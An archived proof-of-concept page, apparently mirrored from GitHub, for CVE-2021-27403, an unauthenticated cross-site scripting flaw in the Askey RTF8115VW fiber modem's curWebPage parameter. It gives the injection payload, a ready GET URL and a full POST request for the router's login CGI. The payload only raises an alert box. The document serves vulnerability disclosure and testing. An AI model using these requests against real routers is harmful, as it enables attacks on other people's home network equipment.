Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-27403 PoC — Askey RTF8115VW 跨站脚本漏洞

Source
https://github.com/bokanrb/CVE-2021-27403
Associated Vulnerability
Title:Askey RTF8115VW 跨站脚本漏洞 (CVE-2021-27403)
Description:Askey RTF8115VW是中国Askey公司的一个应用软件。提供最稳定宽带连接源的所有类型的用户带来超快速度。 Askey RTF8115VW 中存在跨站脚本漏洞。该漏洞源于 cgi-bin/te_acceso_router.cgi curWebPage 缺少对客户端数据的正确验证导致。以下产品及版本受到影响:Askey RTF8115VW BR_SV_g11.11_RTF_TEF001_V6.54_V014。
Description
XSS-Askey
Readme
**UNAUTHENTICATED Cross-Site Scripting - Askey Internet Fiber Modem**

Vendor: **Askey**   
Software Version: **BR_SV_g11.11_RTF_TEF001_V6.54_V014**  
Model: **RTF8115VW**   
Vulnerable Param: **curWebPage**  
Payload: ```";alert('xss')//```   
Not tested in other model/version.   

Via GET REQUEST
```
At the login request we can issue a GET Request:
http://x.x.x.x/cgi-bin/te_acceso_router.cgi?curWebPage=/settings-internet.asp";alert('xss')//&loginUsername=admin&loginPassword=admin

The Username and Password param, don't need to be valid.
``` 

![Alt text](/xssget.jpg?raw=true "Optional Title")


Via POST REQUEST
```
1) Setup your Proxy (Burp / ZAP / whatever) to intercept the Login request
2) Input the payload after the .asp page used by the curWebPage param
3) Forward the Request
```

The Final Request
```
POST /cgi-bin/te_acceso_router.cgi HTTP/1.1
Host: x.x.x.x
Origin: http://x.x.x.x
Cookie: _httpdSessionId_=ece9eb5b733f7cbc8198ce9b6ab995c2
Upgrade-Insecure-Requests: 1
Referer: http://x.x.x.x/login.asp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Connection: close
Cache-Control: max-age=0
Accept-Encoding: gzip, deflate
Content-Length: 35

curWebPage=%2Fsettings-firewall.asp+payload
 <!---curWebPage=%2Fsettings-firewall.asp";alert('xss')//--->
```

```
File Snapshot

 [4.0K]  /data/pocs/7c880f915147cd5c16520809af94c0e8c62fd62a
├── [1.4K]  README.md
└── [ 22K]  xssget.jpg

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.